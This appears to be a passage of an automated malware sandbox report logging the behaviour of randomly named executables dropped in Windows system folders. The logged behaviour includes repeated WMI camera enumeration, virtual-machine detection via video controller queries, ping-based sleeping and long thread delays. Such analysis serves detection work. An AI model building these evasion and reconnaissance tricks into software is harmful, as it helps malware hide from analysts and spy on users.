                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Uses ping.exe to sleep
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeMemory allocated: 10E0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeMemory allocated: 1AAA0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeMemory allocated: 2380000 memory reserve | memory write watch
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeMemory allocated: 1A550000 memory reserve | memory write watch
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeMemory allocated: 3200000 memory reserve | memory write watch
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeMemory allocated: 1B2E0000 memory reserve | memory write watch
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeMemory allocated: BB0000 memory reserve | memory write watch
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeMemory allocated: 1A6C0000 memory reserve | memory write watch
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeMemory allocated: D30000 memory reserve | memory write watch
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeMemory allocated: 1A7C0000 memory reserve | memory write watch
                              Source: C:\Recovery\0eDO5Zbs.exeMemory allocated: 10E0000 memory reserve | memory write watch
                              Source: C:\Recovery\0eDO5Zbs.exeMemory allocated: 1AC40000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeMemory allocated: 1120000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeMemory allocated: 1AC80000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeMemory allocated: 14E0000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeMemory allocated: 1AE40000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeMemory allocated: 1060000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeMemory allocated: 1AD90000 memory reserve | memory write watch
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeMemory allocated: 1520000 memory reserve | memory write watch
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeMemory allocated: 1AFA0000 memory reserve | memory write watch
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeMemory allocated: 14E0000 memory reserve | memory write watch
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeMemory allocated: 1AFB0000 memory reserve | memory write watch
                              Source: C:\Recovery\0eDO5Zbs.exeMemory allocated: 800000 memory reserve | memory write watch
                              Source: C:\Recovery\0eDO5Zbs.exeMemory allocated: 1A520000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeMemory allocated: 1650000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeMemory allocated: 1AFE0000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeMemory allocated: 1240000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeMemory allocated: 1AE60000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeMemory allocated: 1610000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeMemory allocated: 1B3C0000 memory reserve | memory write watch
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeMemory allocated: B20000 memory reserve | memory write watch
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeMemory allocated: 1A840000 memory reserve | memory write watch
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeMemory allocated: B80000 memory reserve | memory write watch
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeMemory allocated: 1A730000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599891Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599766Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599657Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599485Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599370Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599233Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599125Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 597656Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 597519Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 597391Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 597219Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 597046Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 600000
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 599844
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 599702
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 3600000
